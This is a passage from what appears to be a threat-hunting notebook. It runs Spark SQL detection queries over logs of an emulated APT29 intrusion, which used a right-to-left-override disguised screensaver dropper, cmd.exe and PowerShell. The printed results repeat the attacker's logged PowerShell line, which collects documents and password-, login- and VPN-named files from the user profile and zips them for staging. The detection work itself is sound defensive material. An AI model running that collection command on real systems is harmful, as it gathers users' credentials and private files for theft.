Hashes: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ParentProcessId: 8524
ParentImage: C:\ProgramData\victim\‮cod.3aka3.scr
ParentCommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S 
-RECORD 1--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:57:12.376
ProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ProcessId: 3480
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.18362.449 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\windows\system32\cmd.exe"
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ParentProcessId: 8524
ParentImage: C:\ProgramData\victim\‮cod.3aka3.scr
ParentCommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S 

Query ID:C8D664CD-48EE-4663-AE49-D5B0B19014C7

# Security 4688 (process creation) events in which cmd.exe was started by a
# parent whose name carries a Unicode bidirectional control character (or its
# "â€" mojibake form) -- the right-to-left-override trick that disguises the
# ".scr" dropper's extension (compare the ParentImage values shown above).
# The pattern lives in a non-raw string, so '\\' reaches Spark as one backslash.
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
  AND LOWER(NewProcessName) LIKE "%cmd.exe"

'''
df = spark.sql(query)
# Print every matching event in full, one field per line.
df.show(n=100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xad4
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x214c
	Creator Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Process Command Line:	"C:\windows\system32\cmd.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xd98
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x214c
	Creator Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Process Command Line:	"C:\windows\system32\cmd.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

1.B.2. PowerShell

Procedure: Spawned interactive powershell.exe

Criteria: powershell.exe spawning from cmd.exe

Detection Type: Telemetry (Correlated)

Query ID:C1DBF5F2-21D5-45E4-8D9A-44905F1F8242

# Sysmon 1 (process create) for powershell.exe, restricted to instances whose
# parent is a cmd.exe that was itself spawned by a parent whose image name
# contains a bidirectional control character (or its "â€" mojibake form).
# The inner select (b) yields the ProcessGuid of those cmd.exe processes; the
# outer select keeps powershell.exe events whose ParentProcessGuid is one of them.
query = '''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
        AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
        AND LOWER(Image) LIKE '%cmd.exe'
) b
ON a.ParentProcessGuid = b.ProcessGuid
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(Image) LIKE '%powershell.exe'

'''
df = spark.sql(query)
# Full, untruncated dump of each correlated event.
df.show(n=100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:56:14.894
ProcessGuid: {47ab858c-e14e-5eac-ac03-000000000400}
ProcessId: 5944
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e144-5eac-ab03-000000000400}
ParentProcessId: 2772
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:57:15.946
ProcessGuid: {47ab858c-e18b-5eac-b103-000000000400}
ProcessId: 6868
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 
-RECORD 2----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:59:04.124
ProcessGuid: {47ab858c-e1f8-5eac-bc03-000000000400}
ProcessId: 3832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 

Query ID:43B46661-3407-4302-BA8C-EE772C677DCB

# Security-log counterpart of the Sysmon query above: 4688 events for
# powershell.exe whose creator process (a.ProcessId, a hex string such as
# "0xad4") is the NewProcessId of a cmd.exe 4688 event whose parent name
# carries a bidirectional control character (or its "â€" mojibake form).
# Both sides of the join are the log's own "0x..." strings, so no conversion
# is needed here.
query = '''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
        AND LOWER(NewProcessName) LIKE '%cmd.exe'
) b
ON a.ProcessId = b.NewProcessId
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(NewProcessName) LIKE '%powershell.exe'

'''
df = spark.sql(query)
# Full, untruncated dump of each correlated event.
df.show(n=100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1738
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xad4
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1ad4
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 2----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xef8
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.  

2.A.1. File and Directory Discovery

Procedure: Searched filesystem for document and media files using PowerShell

Criteria: powershell.exe executing (Get-)ChildItem

Detection Type: Telemetry (Correlated)

Query ID:10C87900-CC2F-4EE1-A2F2-1832A761B050

# Three-way correlation, Sysmon flavour:
#   d -- every Sysmon 1 process-create event (ParentProcessGuid, ProcessGuid, ProcessId)
#   c -- PowerShell 4104 script blocks mentioning "childitem", tied to d by
#        ExecutionProcessID = ProcessId (the PowerShell process itself)
#   a -- the Sysmon 1 event of that process's parent, which must in turn have
#        been launched by an image whose name carries a bidirectional control
#        character (or its "â€" mojibake form).
# Output is the script block text only.
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
# Script blocks can be long; print them untruncated.
df.show(n=100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:26F6963D-00D5-466A-B4BA-59DA30892B26

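# Three-way correlation, Security-log flavour:
#   d -- every 4688 event, with NewProcessId stripped of its "0x" prefix
#   c -- PowerShell 4104 script blocks mentioning "childitem", tied to d by
#        matching the (numeric) ExecutionProcessID against the hex NewProcessId
#   a -- the 4688 event of the PowerShell process's creator (b.ProcessId), which
#        must itself have a parent name carrying a bidirectional control
#        character (or its "â€" mojibake form).
# Fix: Spark's hex() emits upper-case digits (e.g. "1AD4") whereas the 4688
# NewProcessId field is logged lower-case (e.g. "0x1ad4" above), so the PID
# join silently dropped every PID containing a-f.  Upper-casing the 4688 side
# makes the comparison case-insensitive.
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON hex(c.ExecutionProcessID) = UPPER(d.NewProcessId)
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
# Script blocks can be long; print them untruncated.
df.show(n=100, truncate=False, vertical=True)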
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.2. Automated Collection

Procedure: Scripted search of filesystem for document and media files using PowerShell

Criteria: powershell.exe executing (Get-)ChildItem

Detection Type: Telemetry (Correlated)

Query ID:F96EA21C-1EB4-4988-8F98-BD018717EE2D

# Same Sysmon correlation as in 2.A.1, reused for Automated Collection: the
# "childitem" script block (c) is linked to its PowerShell process (d) by PID,
# and that process's parent (a) must have been launched by an image whose name
# carries a bidirectional control character (or its "â€" mojibake form).
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
# Script blocks can be long; print them untruncated.
df.show(n=100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:EAD989D4-8886-46DC-BC8C-780C10760E93

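# Security-log variant of the Automated Collection correlation: the "childitem"
# script block (c, 4104) is linked to the 4688 event that created its
# PowerShell process (d) by PID, and that event's creator PID is matched to a
# cmd.exe 4688 event (a) whose parent name carries a bidirectional control
# character (or its "â€" mojibake form).
# Fix: Spark's hex() emits upper-case digits (e.g. "1AD4") whereas the 4688
# NewProcessId field is logged lower-case (e.g. "0x1ad4" above), so the PID
# join silently dropped every PID containing a-f.  Upper-casing the 4688 side
# makes the comparison case-insensitive.
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON hex(c.ExecutionProcessID) = UPPER(d.NewProcessId)
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
# Script blocks can be long; print them untruncated.
df.show(n=100, truncate=False, vertical=True)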
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.3. Data from Local System

Procedure: Recursively collected files found in C:\Users\Pam\ using PowerShell

Criteria: powershell.exe reading files in C:\Users\Pam\

Detection Type:None(None)

2.A.4. Data Compressed

Procedure: Compressed and stored files into ZIP (Draft.zip) using PowerShell

Criteria: powershell.exe executing Compress-Archive

Detection Type:Telemetry(Correlated)

Query ID:6CDEBEBF-387F-4A40-A4E8-8D4DF3A8F897

# Query 6CDEBEBF (Sysmon variant): locate the script block that ran
# Compress-Archive, tie it to the PowerShell process (4104 ExecutionProcessID
# = Sysmon 1 ProcessId), then to that process's parent via ProcessGuid =
# ParentProcessGuid, and keep parents whose ParentImage contains a Unicode
# bidi-control character.
#
# NOTE(review): the RLIKE alternation mixes raw bidi characters with what
# looks like mojibake ("â€"); confirm it still matches U+202E (RTLO) as intended.
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:621F8EE7-E9D8-417C-9FE5-5A0D89C3736A

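# Query 621F8EE7 (Security variant): find the script block that ran
# Compress-Archive and walk two 4688 hops (PowerShell process, then its
# parent), keeping parents whose ParentProcessName contains a Unicode
# bidi-control character.
#
# Fix: Spark's hex() returns upper-case digits, whereas 4688 logs NewProcessId
# in lower case ("0x131c"), so the inner join silently missed any PID whose
# hex form contains a letter. LOWER(hex(...)) makes the comparison exact and
# matches the monkey.png query later in this notebook, which already does so.
#
# NOTE(review): the RLIKE alternation mixes raw bidi characters with what
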